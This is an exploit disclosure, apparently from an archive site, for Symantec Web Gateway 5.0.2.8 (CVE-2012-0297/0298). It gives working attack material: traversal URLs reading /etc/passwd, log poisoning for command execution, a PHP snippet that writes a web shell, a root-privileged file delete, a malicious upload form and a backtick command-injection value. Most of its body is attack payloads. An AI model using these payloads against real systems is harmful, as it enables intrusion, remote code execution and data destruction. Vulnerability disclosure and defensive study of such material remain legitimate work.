Symantec Web Gateway 5.0.28 LFI / Code Execution

Symantec Web Gateway 5.0.28 LFI / Code Execution: Posted Jun 27, 2012; Authored by S2 Crew; Symantec Web Gateway version 5.0.2.8 suffers from local file inclusion, remote command execution, and arbitrary file deletion vulnerabilities.; tags | exploit, remote, web, arbitrary, local, vulnerability, file inclusion; advisories | CVE-2012-0297, CVE-2012-0298; SHA-256 | a0fccf32d3c50c44bbaec6e8b29d6a94e5b750a7a3630cb98f887b64cf02a1a9; Download | Favorite | View

Symantec Web Gateway 5.0.28 LFI / Code Execution

Software: Symantec Web Gateway
Current Software Version: 5.0.2.8
Product homepage: www.symantec.com
Author: S2 Crew [Hungary]
CVE: CVE-2012-0297, CVE-2012-0298, ???
 
File include:
        https://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd
 
File include and OS command execution:
        http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd
        You can execute OS commands just include the error_log:
        /usr/local/apache2/logs/
        -rw-r--r--   1 root   root  5925 Nov 15 07:25 access_log
        -rw-r--r--   1 root   root  3460 Nov 15 07:21 error_log
 
        Make a connection to port 80:
        <?php
        $f = fopen('/var/www/html/spywall/cleaner/cmd.php','w');
        $cmd = "<?php system(\$_GET['cmd']); ?>";
        fputs($f,$cmd);
        fclose($f);
        print "Shell creation done<br>";
        ?>
 
Arbitary file download and delete:
        https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog
    d parameter: the complete filename
        After the download process application removes the original file with root access! :)
 
        Command execution methods:
        1.Method
        Download and delete the /var/www/html/ciu/.htaccess file.
        After it you can access the ciu interface on web.
        There is an upload script: /ciu/uploadFile.php
    User can control the filename and the upload location:
        $_FILES['uploadFile'];
        $_POST['uploadLocation'];
 
        2.Method
        <form action="https://192.168.82.192/ciu/remoteRepairs.php" method="POST" enctype="multipart/form-data">
        <input type="file" name="uploadFile">
        <input type="text" name="action" value="upload">
        <input type="text" name="uploadLocation" value="/var/www/html/spywall/cleaner/">
        <input type="hidden" name="configuration" value="test">
        <input type="submit" value="upload!">
        </form>
     
    The "/var/www/html/spywall/cleaner" is writeable by www-data.
 
Command execution after authentication:
 
        http://192.168.82.207/spywall/adminConfig.php (this is deprecated config file, it should be remove)
 
        From the modified POST message:
        Content-Disposition: form-data; name="pingaddress"
        127.0.0.1`whoami>/tmp/1234.txt`

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Symantec Web Gateway 5.0.28 LFI / Code Execution

Symantec Web Gateway 5.0.28 LFI / Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Symantec Web Gateway 5.0.28 LFI / Code Execution

Share This

Symantec Web Gateway 5.0.28 LFI / Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems